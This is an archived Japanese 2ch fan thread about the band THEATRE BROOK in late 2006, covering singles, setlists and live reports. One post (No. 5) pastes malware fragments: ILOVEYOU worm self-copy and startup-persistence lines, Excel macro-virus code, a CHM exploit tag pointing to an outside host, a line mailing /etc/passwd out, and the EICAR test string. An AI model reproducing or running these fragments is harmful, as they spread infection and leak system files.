2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

THEATRE BROOK/シアターブルック

1 :名無しさん@お腹いっぱい。:2006/10/17(火) 12:36:26 ID:4yYBQ3Jx0
公式サイト
ttp://www.theatrebrook.com/

2 :名無しさん@お腹いっぱい。:2006/10/17(火) 12:38:59 ID:4yYBQ3Jx0
sage進行推奨。Liveはage。
荒らし、煽り、釣り、厨房、他アーティスト晒し、
その他頭のおかしい人はスルーの方向で。

3 :名無しさん@お腹いっぱい。:2006/10/17(火) 12:50:00 ID:4yYBQ3Jx0
関連リリース。

“Taiji AllStars”

「君が笑う方へ feat. bird / Star Navigation feat. SAKURA」
(FLCG-7000 \1,050(税込))11/29

ttp://www.taijiallstars.com/

4 :名無しさん@お腹いっぱい。:2006/10/17(火) 13:22:09 ID:3Px+6JCPO
>>1サン乙
ありがと!Part.11だよねw

5 :名無しさん@お腹いっぱい。:2006/10/17(火) 18:47:19 ID:MAvtGKvQ0
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܵܶ

6 :名無しさん@お腹いっぱい。:2006/10/18(水) 04:30:15 ID:wGtilAHHO
保守w

7 :名無しさん@お腹いっぱい。:2006/10/18(水) 23:01:07 ID:eenE1pCC0
Brookers Nightもうすぐやね

8 :名無しさん@お腹いっぱい。:2006/10/19(木) 07:54:06 ID:lgE1acu0O
>>7
それまで断固保守www

9 :名無しさん@お腹いっぱい。:2006/10/19(木) 21:59:36 ID:iZZB3iCI0
theatreスレ復活? ライブまだかなぁ

10 :名無しさん@お腹いっぱい。:2006/10/20(金) 00:22:20 ID:LyIv9wO6O
凄い愉しみwそして保守w

11 :名無しさん@お腹いっぱい。:2006/10/21(土) 02:02:18 ID:pY4+zkt4O
新曲聴いた〜そして保守!

12 :名無しさん@お腹いっぱい。:2006/10/22(日) 00:31:41 ID:Lu5Cu/i40
>>11
新曲?

13 :名無しさん@お腹いっぱい。:2006/10/23(月) 05:03:05 ID:3FLq3ONaO
>>12
FMでかかってない?

つか、ライブ近いしageていいかな?

14 :名無しさん@お腹いっぱい。:2006/10/24(火) 14:55:33 ID:9JqOO2WU0
FCの更新とチケット代が地味に痛い出費…

15 :名無しさん@お腹いっぱい。:2006/10/25(水) 08:49:28 ID:SZXVq7JZO
よし!ageよう!

16 :名無しさん@お腹いっぱい。:2006/10/26(木) 15:52:57 ID:a0pckWFHO
アルバム、はよでんかな?
待ってるよん

一般誌でタカさんの顔、いっぱいみたなぁ
シアターのアルバム、シングル売れてちょ!

17 :名無しさん@お腹いっぱい。:2006/10/26(木) 21:55:26 ID:Np7ErWF90
FM802のチャートで100位内に入ってるね



18 :名無しさん@お腹いっぱい。:2006/10/27(金) 03:45:20 ID:ozGaYoqQO
ライブもうすぐやね!age!

19 :名無しさん@お腹いっぱい。:2006/10/29(日) 10:03:16 ID:o6fidlQKO
保守!

20 :名無しさん@お腹いっぱい。:2006/10/30(月) 01:50:26 ID:eKyxMyU90
シングル出たの?今度のライブって代官山の?

21 :名無しさん@お腹いっぱい。:2006/10/30(月) 18:59:34 ID:fSYbKWxK0
>>20
シアター名義じゃないけど11/29に出る
ttp://www.forlife.co.jp/

ライブはまさに昨日が代官山

22 :名無しさん@お腹いっぱい。:2006/10/31(火) 04:38:10 ID:1ikcyyBaO
レポしたいケド、ヒトおらんやんかw


23 :名無しさん@お腹いっぱい。:2006/10/31(火) 17:59:57 ID:jbym/QNXO
オヒも過疎ってるなーorz
レポおながいします
できればセトリ付きで

24 :名無しさん@お腹いっぱい。:2006/10/31(火) 21:03:00 ID:lYxhBNxF0
代官山のレポお願いします。行きたかった〜
あそこ、小さいでしょ?客何人くらいきてた?
セットリストと、できれば服装なども・・
最近のシアターどうなってるんだろ?

25 :名無しさん@お腹いっぱい。:2006/11/01(水) 22:58:46 ID:mWcnwVphO
もうageスレで…w

Taiji All〜の新曲のサビがシアターの曲と被って仕方ない…
が、タイトルが思い出せない…ここ毎日、FMで耳にしてるのにw


26 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:28:27 ID:DFWSgm4N0
原人みたいな人がボーカルのグループか

27 :名無しさん@お腹いっぱい。:2006/11/02(木) 03:54:42 ID:VDipdl/D0
22さん、いつでもいいんでレポよろしく。
シアターのシングル、アルバムはまだまだ先かなぁ。
ライブはどうなってるんだろ?盛り上がってるのか?
ロフト以来行ってないけど又行きたくなった。

28 :名無しさん@お腹いっぱい。:2006/11/02(木) 15:50:22 ID:+b0PRrL90


29 :名無しさん@お腹いっぱい。:2006/11/02(木) 21:28:06 ID:Oe2T9dI10
とうとう802の100位チャートでラストの100位に落ちましたね・・・。
まだリリース前なのに

30 :名無しさん@お腹いっぱい。:2006/11/03(金) 01:34:16 ID:Bb8gW0Si0
昔にぎわってたのに(自分もずいぶん来てなかったけど)
さびれちゃったね、シシタースレ。
アルバムが5枚目からあれ?って感じで、タイジの結婚あたりから
タイジの言動と嫁といちゃつきののイタタな話が多くて
引いちゃったけど。人気すっごく下がった?ファンいるのかね?
嫁がサゲマンだったんだねって言いたくなる。

31 :1:2006/11/03(金) 03:03:18 ID:kmmPszxQ0
>>30
スレ立てた者ですが、
最近はmixiやFCでやってるSNSなんかもあるらしく
需要がなくなったのかもしれません。

正直、書き込みも少ないから沈めちゃってもいいかなーみたいな今日此の頃…

32 :名無しさん@お腹いっぱい。:2006/11/03(金) 08:56:15 ID:oPKa7AMWO
>>31
最初に感謝した者です
立ててくれてありがとう…

ランキングは別としてwNORTH WAVEじゃ結構流れてるよ…マターリ行こう!

ただSAKURA Ver.がシアターの曲と被るんだよね…何だっけ?

33 :名無しさん@お腹いっぱい。:2006/11/03(金) 08:57:26 ID:oPKa7AMWO
しまったwageよう!

34 :名無しさん@お腹いっぱい。:2006/11/03(金) 21:18:02 ID:bes94Nwn0
代官山のセットリストお願いします。

35 :名無しさん@お腹いっぱい。:2006/11/03(金) 22:28:49 ID:RNzZJM8N0
>>31
スレ立て乙です
mixiのシアタースレもたいしたことないよ
とにかくタイジのシアターへの情熱が冷めちゃったのが一番おっきい
サンパウロのライトなオーディが好きみたいだし
前はそれでもこっち(シアターファン)はシアターを求めてたけど
FCやらタイジの態度やらでもう疲れましたって感じ
報われないし本人やる気ナシだからこっちも半ば諦めだよ

36 :名無しさん@お腹いっぱい。:2006/11/05(日) 02:35:33 ID:67/FA59SO
盛り上げていこう
ギターヒーロとカリスマドラマーのいるバンドなんで
もっとドッカンドッカンこないかな?

露出がふえるといいねぇ


37 :名無しさん@お腹いっぱい。:2006/11/05(日) 10:54:54 ID:5BlbBWcz0
ドッカンドッカンばかりじゃ盛り上がれない
学園祭みたいなドッカンは嫌だ
上級者向け大人向け高齢者向けドッカンがいい
やたらとおしゃれなドッカンがいい
身悶えするようなドッカンがいい


38 :名無しさん@お腹いっぱい。:2006/11/05(日) 18:46:00 ID:dk+eSE+D0
代官山のセトリを・・・

39 :名無しさん@お腹いっぱい。:2006/11/05(日) 23:47:55 ID:IJpG8XZA0
ギターヒーローとカリスマドラマー
マジでそう思ってるならワロス。

大人がゆるーく楽しめるライブやってほしい。


40 :名無しさん@お腹いっぱい。:2006/11/06(月) 12:49:00 ID:o9qIdYi70
だってやっぱり歌以外はみんな凄いいいバンドと思うよ。
大人がゆるーく楽しめるライブも前はやってたでしょ。
ドッカンドラムと延々キンキンギターソロのライブもやってたけど。
タイジがシアター熱冷めたなんてガックリだよ。
サンパウロこそシアターの暇にやってるはずだったのに。
あっちがメインになるなんてさ。バンドはシアターなのに。。
結局タイジがいかんのだろう。タイジの熱と中身がおかしいのか。
アルバム出して欲しい。

41 :名無しさん@お腹いっぱい。:2006/11/06(月) 19:05:16 ID:xNLnFciK0
えっ、今サンパウロがメインなの

42 :名無しさん@お腹いっぱい。:2006/11/06(月) 22:56:12 ID:0tJLEuyM0
>>38
Smashing Magでセトリとフォトレポあがってたよ



43 :名無しさん@お腹いっぱい。:2006/11/06(月) 23:11:48 ID:6uvOojah0
新曲はなんでTaiji All Stars名義なんだろう。

THEATRE BROOK feat.bird
THEATRE BROOK feat.SAKURA

で、いんじゃないのって疑問。

44 :名無しさん@お腹いっぱい。:2006/11/06(月) 23:39:46 ID:gKnUoxfA0
  - setlist -

 1部
1.欲望の轍
2.大統領
3.ギリギリまでもう一回
4.It's Your World (Gil Scott Heron)
5.昨日よりちょっと

 2部
6.CALM DOWN
7.涙の海
8.ありったけの愛
9.立ち止まって一服しよう
10.まばたき

Smashing Mag からコピペしてきました。
It's Your World (Gil Scott Heron)が忘れられない。
本当に感動した。絶妙な上手さだった。素敵だった。
ああいうのいっぱい作って沢山演奏してくれないかしら。
そうしたら友達100人連れて行く。しまった100人もいなかった。
休憩にかかっていたSAKURAもとても良かった。CD買います。



45 :名無しさん@お腹いっぱい。:2006/11/07(火) 05:59:06 ID:HsjTalhNO
俺も100人連れてく!


46 :名無しさん@お腹いっぱい。:2006/11/08(水) 03:11:21 ID:j3s0M1sS0
10曲って少なくない?1曲が延々と長いのかな?
でもいいセットリストだね〜新旧入り混じってて。
次のライブにひっそりと行こうかな。シアターみたいなバンドって
なかなかないよね。ライブが良くて曲が良くてみんな上手いのって。

47 :名無しさん@お腹いっぱい。:2006/11/08(水) 10:48:21 ID:2VjXwtF10
俺は37人つれてく!

48 :名無しさん@お腹いっぱい。:2006/11/08(水) 13:50:11 ID:ELfuQVvkO
細かいよ…
私はマイクロバスガイドさん付きで51人つれてく!

49 :名無しさん@お腹いっぱい。:2006/11/14(火) 14:37:53 ID:JK5e20lk0
うわ、久しぶりにきたら新スレ出来てたのね。

50 :名無しさん@お腹いっぱい。:2006/11/16(木) 20:54:25 ID:6NsedtTh0
明日スペシャの HITS JAPANという番組でTAIJI ALL STARSの「君が笑うほうへ」のPVがかかりますよ〜

51 :名無しさん@お腹いっぱい。:2006/11/24(金) 06:46:41 ID:QUMPOm/mO
森上げようぜ

52 :名無しさん@お腹いっぱい。:2006/11/28(火) 20:53:47 ID:rrTZrgfq0
次のシングルはHITOMIと松雪さんですね


53 :名無しさん@お腹いっぱい。:2006/11/29(水) 04:02:56 ID:NTZpkEYYO
松雪か・・・

54 :名無しさん@お腹いっぱい。:2006/11/29(水) 16:23:15 ID:+P2vDe0+0
Live DVDだして

55 :名無しさん@お腹いっぱい。:2006/11/29(水) 18:36:07 ID:W2oX7iin0
hitomiか・・・・

56 :名無しさん@お腹いっぱい。:2006/11/29(水) 20:04:37 ID:a3sRa3RA0
で、次にLeyonaみたい。アルバムで。

新曲なかなか良いと思うんだけど、プロモーション弱そうだからやはり売れそうにないね。

57 :名無しさん@お腹いっぱい。:2006/11/29(水) 23:48:09 ID:ZegpXJDl0
なんか豪華だなー。
でもどんどんシアターが変化してくような気もする。

タイジは「変わらない」って言葉をよく歌に使ってるが、
バンド自体はものすごく変わってきてるよな。

58 :名無しさん@お腹いっぱい。:2006/11/30(木) 00:26:09 ID:8jkq+2o90
来年は”シアター”をやるって言ってますけどねぇ。どうなんでしょう。
タイジはロックな気分らしいんですが…

59 :名無しさん@お腹いっぱい。:2006/11/30(木) 03:31:54 ID:CFys0XgTO
シングル買いまつた。
キモチイー感じだった。

>>57
シアターとは全く違う方向性だからタイジオールスターズ名義にしたとラジオで言っていたよ。タイジも理解してやっている事じゃないかな。


シアターとしての年末ライブと、来年に更なる期待!

60 :名無しさん@お腹いっぱい。:2006/11/30(木) 03:56:22 ID:nhtbZmc90
TAIJI ALL STARS って収益活動でもあるのかな。
だとしたら、山下達郎よりもずっと品の良い正道的な資金調達方法だと思う。
成功すると良いですね!

61 :名無しさん@お腹いっぱい。:2006/11/30(木) 09:12:45 ID:11jyzQt6O
ageていいかな?
妖怪はどこへいったんだろう・・・

62 :名無しさん@お腹いっぱい。:2006/11/30(木) 12:19:59 ID:nhtbZmc90
妖怪は100年来のねっとりしっとりした沼澤ファンですからね。
ショックで消えちゃったとか・・・・・・!

63 :名無しさん@お腹いっぱい。:2006/11/30(木) 20:26:19 ID:11jyzQt6O
>>62
(((゚Д゚)))

64 :名無しさん@お腹いっぱい。:2006/12/01(金) 05:11:17 ID:CdnbbeHiO
心配しなくても妖怪はヌマースレに生息してるぉ。
ただ塗り壁軍団もファビョってるから
ある意味、地獄絵図だけどw

つかhitomiか・・・orz
だからありったけカバーしたのか。なんだかな。

65 :名無しさん@お腹いっぱい。:2006/12/01(金) 06:31:40 ID:DIzj8iP1O
妖怪と塗り壁の違いをひとつ教えてぉ

つかNEWシングルどこにも売ってないぉ。早くも売り切れみたいだぉ。(まさか置いてないのかぉ。)
ライブ会場で流れていた時、こりゃ絶対に売れると思ったぉ。とっても心地良かったぉ。
長文ごめんなさいぉ

66 :名無しさん@お腹いっぱい。:2006/12/01(金) 08:12:03 ID:yXLKYnkxO
妖怪の人気に嫉妬w

67 :名無しさん@お腹いっぱい。:2006/12/01(金) 17:49:37 ID:vkYCv8C9O
いれば嫌がるくせに居なきゃ居ないで話題になる
あるいみすごいやつだ

68 :名無しさん@お腹いっぱい。:2006/12/01(金) 20:51:41 ID:DIzj8iP1O
NEWシングル「君が笑う方へ」「Star Navigation」ちゃんと手に入れました〜。
タワレコに「Taigi All Stars」のスペースが設けられてた!
絶対売れると思う。
私自分が贈るお歳暮などにこのCD添える!
聴いているだけでとっても平穏な気持ちになった。微妙にウルッときます。

69 :名無しさん@お腹いっぱい。:2006/12/02(土) 00:21:47 ID:/STdGxsr0
>>67
それって・・・w


嫌われ者の典型ではないですかハテナマーク

70 :名無しさん@お腹いっぱい。:2006/12/02(土) 14:02:11 ID:/STdGxsr0
仕事しながらNEWシングルずっと聴いています。
本当に良い・・・・・心地良い・・・感動・・

71 :名無しさん@お腹いっぱい。:2006/12/02(土) 22:44:33 ID:TGUZACABO
>>69 あんたのことさ

72 :名無しさん@お腹いっぱい。:2006/12/03(日) 01:13:52 ID:PVsSoNHz0
>>71
みたいだわさ

73 :名無しさん@お腹いっぱい。:2006/12/05(火) 20:52:45 ID:bygm3EEO0
ふと思ったんだけど・・・

>>70
もしや、えっちゃん?

74 :名無しさん@お腹いっぱい。:2006/12/06(水) 01:42:48 ID:K2CgiQc40
>>73
てーか、えっちゃんって、誰?
あと、妖怪と塗り壁って、どんな人たちなのか、
私も知りたい。

75 :名無しさん@お腹いっぱい。:2006/12/06(水) 21:07:50 ID:AEh6tNfnO
こちらサッポロ!
寒いケド今月NOUTH WAVEのメガプレイに新曲キタ━━━━━(゚∀゚)━━━━ッ!!!

ライジングのタイジ思い出せばアッタカイ?(((;ーД-)))

しかし新曲…シアターの何かに大サビが似てないかなぁ…何だっけ?

さて残業するかな…orz

76 :名無しさん@お腹いっぱい。:2006/12/06(水) 21:09:27 ID:AEh6tNfnO
>>74
ヒントつ過去ログ…

77 :名無しさん@お腹いっぱい。:2006/12/06(水) 22:56:09 ID:HbHw7u10O
>>75
札幌さん!
NEWシングルの「あ〜あの星はあの星は…」が、まばたきの「さ〜今ここを旅立つのさ…」よねっ!

「許〜して欲しい 僕は臆病者〜で」のところでわたしは音楽的身悶え。微妙に調子っパズレた歌い方…そこが魅力的かも。
NHKのど自慢でタイジとSAKURAがこれ歌ったら、カンカンカンカンカンカンカンカンキ~ンコ~ンカ~ンって鳴るかなぁ〜wって思うのだけれど、何だか伝わるものがとっても多いシングルではありませんか。
もうずっと流してる。スーパーの魚売り場の、さかなさかなさかな〜♪の曲みたいに、もやし売り場の、も〜やしも〜やしっ♪みたいに、仕事場で寝室で、もうず〜〜〜っとNEWシングル流しっぱなしお気に入り。
birdの方の沼澤さんのドラムが、魔法みたいに素敵…
シアターって凄い…ことになりそう?

78 :名無しさん@お腹いっぱい。:2006/12/07(木) 00:32:53 ID:mIL7c+d4O
妖怪がすぐ判別できるようになっちまった…

79 :名無しさん@お腹いっぱい。:2006/12/07(木) 23:21:32 ID:IlI6MF7rO
いけなかったかしら…純粋に褒め称えたかったのに……全然褒め称えてなかったみたいorz ゴメンナサイ

80 :名無しさん@お腹いっぱい。:2006/12/08(金) 20:47:00 ID:Yboby2KSO
今日のMステにて、井上陽水奥田民生のバックでタイジがギター弾いてた〜

81 :名無しさん@お腹いっぱい。:2006/12/08(金) 21:27:43 ID:3Z+YRXiSO
タイジも沼澤さんも自分達も新曲出した
ばっかりなのに人のバックで出てる場合じゃないだろ

82 :名無しさん@お腹いっぱい。:2006/12/09(土) 03:50:52 ID:fihG+4OiO
>>80
ちょwww
それってどっかに情報出てた?

83 :名無しさん@お腹いっぱい。:2006/12/09(土) 04:20:19 ID:F34UYWkFO
今度のHEYx3もタイジらしい。
いつ放送かは知らないけど。

84 :名無しさん@お腹いっぱい。:2006/12/09(土) 04:42:10 ID:fihG+4OiO
教えてくれてありがとう!
タイジが、メインじゃないにしろテレビに出るならメルマガ流してほしかったな。

85 :名無しさん@お腹いっぱい。:2006/12/09(土) 04:54:32 ID:F34UYWkFO
ま、自分もたまたま夕方に沼澤さんのHPで出演知って
見てたらタイジも居た、って感じなんだけど。
HEYx3も民生スレで見つけたし。
ほんと、メルマガぐらい出してほしいよね。

86 :名無しさん@お腹いっぱい。:2006/12/09(土) 10:55:30 ID:TfMuck0NO
Mステ出るってどうしてもっと早く教えてくれなかったの…
終わってから言ったって…(;_;)
ここではいち早く何でも教えて下さい。お願いします。m(_ _)mm(_ _)mo(_ _*)o

87 :名無しさん@お腹いっぱい。:2006/12/09(土) 12:21:17 ID:iNlwBL4i0
仕事場で流せるってどんな職場だよ、ばか

88 :名無しさん@お腹いっぱい。:2006/12/09(土) 15:33:59 ID:Qe82KMI10
ただ居ただけだった・・・
公開天気番組の後ろでテレビ映ったとハシャグ子供みたいなもん
あれ見て喜ぶのは本人達とファンだけだろう
一般にシアターは認識されないよな その程度の政治力なんだな・・・

89 :名無しさん@お腹いっぱい。:2006/12/09(土) 15:53:45 ID:31k+KOGE0
ファンでも正直喜べないっす。
せめてバックバンドじゃなくてバンドメンバーとして座りトークにでも参加してくれれば…

90 :名無しさん@お腹いっぱい。:2006/12/09(土) 19:16:12 ID:TfMuck0NO
バンドで民放に出ちゃったらカッコ悪いっす
出ない方がいいわ〜

91 :名無しさん@お腹いっぱい。:2006/12/10(日) 13:51:52 ID:ttb1O2GH0
12/9 ストップロッカショ3Days 佐藤タイジ ライブ映像
http://www.stickam.jp/profile/stop_rokkasho

92 :名無しさん@お腹いっぱい。:2006/12/11(月) 23:20:45 ID:QDh4BcSFO
HEY×3 見逃した・・・orz


93 :名無しさん@お腹いっぱい。:2006/12/12(火) 02:02:26 ID:hg/RaEHFO
過去ログ読めなくなっているんですが…
にくちゃん死んだんだ…
●買いたくないよ〜
助けてタイジ〜(泣

94 :名無しさん@お腹いっぱい。:2006/12/15(金) 07:15:13 ID:NYJO3jdrO
沼澤さん、陽水民生のツアー決まったけどタイジも出るのかな?


95 :名無しさん@お腹いっぱい。:2006/12/18(月) 17:50:25 ID:OozX0ob20
一応、年末恒例のリキッドまでは保守しとくかな。

96 :名無しさん@お腹いっぱい。:2006/12/21(木) 08:49:03 ID:uIXqP9UYO
保守含めてあげwこちらサッポロ!
目覚ましタイマーの一発目が【スタナビ】だった!
メガプレイだから今月一杯は聴けるわ…(職場で聴けるw)
日曜のTop100で10位以内に入ってた気がしたのは記憶違いかな?
しかしJ-WAVE系列は一般に反映されないね…orz

リキッド…その前にEGO-WRAPPIN'のキネマ倶楽部に行ってくるよ

ねぇ…スタナビのサビ、シアターの何に似てるかな?忙しくてCD掘り起こし出来ないorz
♪あ〜あの星は〜…のトコ
沼サンのかな?喉元まできてるのに思い出せない…妖怪…

B-Tの日武にタイジ出て【胎児】なんて…ないかwww
朝から妄想失礼しましたw
ではそろそろ仕事に…


97 :名無しさん@お腹いっぱい。:2006/12/21(木) 09:00:01 ID:uIXqP9UYO
あ、ちなみにいままで【無実の子】ベストやと思っとったケド、最近は【オレタチフューチャー】かな?

朝から自分語りごめんねw

でwww
シアターて結局【The Complete Of THEAUERER BROOCK】しかDVD出てないよね?

ほなw

98 :名無しさん@お腹いっぱい。:2006/12/21(木) 13:28:24 ID:l4QvVRuS0
>>96-97

その件は>>77(妖怪えっちゃんのなりすましだと思うが)が
おまいさんに答えてる。「まばたき」のサビだ。

DVDの件はコンプリだけだが、あくまで初回のおまけなので
すでに市場には存在しない※VHSは2本あるが。

あと、携帯とはいえ「THEAUERER BROOCK」は酷い。
てゆか、全部自演か?


99 :名無しさん@お腹いっぱい。:2006/12/21(木) 23:54:32 ID:uIXqP9UYO
>>98
うわ…素で間違えた…ごめん…
出掛けにジャケ背みながらうったら…

【まばたき】!ありがとう!

ちなみに自演とは無縁ですよ、ID変わる前に…
出先から失礼しました…

100 :名無しさん@お腹いっぱい。:2006/12/22(金) 12:26:00 ID:+5hY9sHJO
>>96
【スタナビ】TOP10入りしているんだぁ〜!!
あのCDを良いと思わない人はいないと思うよ!
ところであれは、鈴木聖美と大槻ケンヂのヒィーチャリング???

101 :名無しさん@お腹いっぱい。:2006/12/22(金) 12:30:13 ID:+5hY9sHJO
間違えちゃったハフハフハヒフヘ……フィーチャリング???

102 :名無しさん@お腹いっぱい。:2006/12/24(日) 16:54:15 ID:3TclNyx7O
メリクリ!
ウイークリーチャート5位〜4位に!@サポーロTop100w
聴き間違いじゃなかったら4月から全国ツアーて云ってた

アルバムも収録し終わったてワクテカwktk
その前にシングル…松雪サン…

クリスマス終わったらキネマ倶楽部に行きますよw

103 :名無しさん@お腹いっぱい。:2006/12/26(火) 23:28:35 ID:TuNyzfmBO
おお!どこまで上がるかな!!!
うちの地方は全然駄目だわorz
ライジングといい美味しいな!!!裏山・・・

104 :名無しさん@お腹いっぱい。:2006/12/27(水) 12:49:41 ID:5mnpaltp0
今日のライブいけなくなりそうです。
どなたか当日券で行こうと考えている人はいらっしゃいませんか?
デジポケが使える方なら、お送りできます。定価以下でよいです。
もしいらっしゃったら、メールください。宜しくお願いします。

105 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:22:58 ID:Cx9u9PNJ0
本日のリキッド、参上します。
ゲストは来るのかな?
女性ボーカル?
個人的には「Rockin' In The Free World」(ニール・ヤング)のカバー、
また聴きたいなー。
昨年の「トゲのないバラ」は嬉しかった。

106 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:02:12 ID:BO7BoUbAO
JB追悼って事でJB期待してます。

107 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:13:52 ID:lPtsHXrtO
今日のリキッドって新宿ですか?それとも恵比寿?

108 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:20:49 ID:IyBoCSNA0
リキッドルームは恵比寿にしかないよ。
新宿はFACEって名前になった。
ライブハウスというよりはプロレス会場。

というわけで、そろそろ行こうかな。

…ここ、本当に人いなくなったね。
一発目に「トゲのないバラ」やってからもう1年経ったんだ。
そういや俺、そのときレポあげたな=ナイル・ロジャース大会。

109 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:26:58 ID:BO7BoUbAO
去年の年末楽しかったよね。

今日も楽しみだ。

110 :名無しさん@お腹いっぱい。:2006/12/27(水) 23:58:50 ID:dWf9o9DPO
セットリストよこせ

111 :名無しさん@お腹いっぱい。:2006/12/28(木) 02:52:30 ID:ih4I977OO
セトリーーーーー

112 :名無しさん@お腹いっぱい。:2006/12/28(木) 02:53:18 ID:ih4I977OO
しまったsageた
セトリーーーーー

113 :名無しさん@お腹いっぱい。:2006/12/28(木) 13:00:10 ID:/zCedRBdO
順不同ね。

聖なる巨人/TAPID RAIN/悲しみは河の中に/俺の手にはギター
生理的最高/ドレッドライダー/ノックしつづける男
捨てちまえ/ONE FINE MORNING/ありったけの愛
まばたき/(en)立ち止まって一服しよう

あと新曲2曲(前後半1曲づつ)やった。
最初のは曲名わからんけど、ギターのリフ聴き覚えあるな〜て感じのアップ。
2曲目は「未来を今に」って言ってたかな。新アルバム路線の西海岸なミディアム。

ちなみにメンバー全員黒っぽい格好で、エマソンはシャーロック・ホームズみたいだた。
定番曲満載、3時間ビッシリの濃厚なライブでしたよ。

114 :名無しさん@お腹いっぱい。:2006/12/28(木) 19:11:55 ID:ih4I977OO
>>113
ddddd!!!

115 :名無しさん@お腹いっぱい。:2006/12/28(木) 19:14:47 ID:AjEtHPJIO
曲順よこせ

116 :名無しさん@お腹いっぱい。:2006/12/28(木) 19:27:07 ID:KoIcj6D+0
年末ライブ仕事が終わらなくて行けませんでした。
放っぽり投げて行ってしまおうかなと思ったけれど、
結局泣きそうになりながら仕事しました。泣いてた。
今更曲順なんて聞きたくない・・・また悲しくなるもん。
盛り上がった?楽しかった?・・・聞きたくないけれど、でもどなたか教えてください。

117 :名無しさん@お腹いっぱい。:2006/12/29(金) 06:12:19 ID:yZBvVcDkO
リキッド当日EGO-WRAPPIN'キネマ行ってしまったよ・・・
昨日はリキッドでソウルセット&マチゾーに行ってしまったよ・・・
今日からロキノンだ〜orz
民夫のときタイジ出ないかな・・・
DVD出してくれ―――

スタナビはJAY-Zが4週チャート一位だからなぁ・・・ヘビロも年内一杯だから後は下がるだけかorz

今年の締括り、RSRの甲子園w楽しかった!


118 :名無しさん@お腹いっぱい。:2006/12/29(金) 12:32:18 ID:oS7QpPRc0
うるせえよ、ばか

119 :名無しさん@お腹いっぱい。:2006/12/29(金) 17:52:46 ID:QsRN8kfw0
久しぶりに行ったら昔のライブとノリが違った。
手拍子とか・・・最近はするものなの?

120 :名無しさん@お腹いっぱい。:2006/12/29(金) 23:40:51 ID:AbUA9q9I0
昔のライブでは手拍子なんてありえないよね。どの曲でやるの?
自分も昔しか知らないけど、ドレッドライダーのピースサイン
は今も健在?悲しみは河の中に〜では、唯一縦跳びで、
あとはみんな勝手に揺れて踊ってたよね。
ガン見の塗壁も後期には出現していたけどw

121 :名無しさん@お腹いっぱい。:2006/12/30(土) 00:01:41 ID:5plH98P/0
明日のサンパウロに友人と行けることになっちゃった〜。
アーティストによるアーティストの為の空間でアーティストが演奏するなんて素敵なコンセプト。さすが!
デザインした森田恭道氏も最近の自信作を「マドラウンジ」って雑誌で言ってたし、
2007年の6月までの期間限定空間らしいから、それ見るのも楽しみ〜。
バキバキの友人とキメキメで行きますわよ!

122 :名無しさん@お腹いっぱい。:2006/12/30(土) 00:10:00 ID:rAjg7BvOO
手拍子てゆか、フラメンコとかのハンドクラップに近いと思うけどね。俺はしないけど。
ドレッドのピースサインと悲しみの「やってまえ」は健在ですね。

しかしタイジ…いい加減「LOVIN'YOU」の歌詞、ちゃんと覚えてきてくれ。

123 :名無しさん@お腹いっぱい。:2006/12/30(土) 00:16:09 ID:whyj8nQp0
タイジの奥さん、ライブに来てるの?のってて楽しそう?

124 :名無しさん@お腹いっぱい。:2006/12/30(土) 00:22:52 ID:5plH98P/0
マドラウンジのサンパウロその前に、私って出入り禁止な人かも・・・やけに空気が冷たい。

125 :名無しさん@お腹いっぱい。:2006/12/30(土) 01:00:39 ID:5plH98P/0
やっぱり気のせいね。クリスマスとリキッドのライブに行けなかった分を取り戻すわ!

126 :名無しさん@お腹いっぱい。:2006/12/30(土) 01:23:24 ID:WMbJlg9r0
>>123
よくいる。あまり楽しそうではない。
他のライブでもタイジがいると傍にいたりするが、
踊ったり揺れたりしてない・・・なんだかなあ。


127 :名無しさん@お腹いっぱい。:2006/12/30(土) 15:07:54 ID:rXu6+mnO0
>>126
ふーん、大人しいのか。タイジの相手だからノリが良くて楽しい人
なのかなぁと思ってた。
昔はさ、一緒に踊ったり嬉しそうにいちゃいちゃしてなかったっけ。
小さくて古風なやや美人ってのは変らないよね?
あのタイジと合うのって大変そうだけど。

128 :名無しさん@お腹いっぱい。:2006/12/30(土) 22:48:41 ID:iLgd5JMkO
レポくれ〜@幕張

129 :名無しさん@お腹いっぱい。:2006/12/31(日) 07:50:58 ID:LnkMiPUeO
>>119
何故かそうなってるね…
日本人だからかな?
他スレでも話題になっているね、必須強制的なものはいらないな…苗るわ

妖怪元気かな?
サポーロチャートはまだ上がるのかな?レポよろ
しかし局でチャートて変わるもんだね@クロスFM

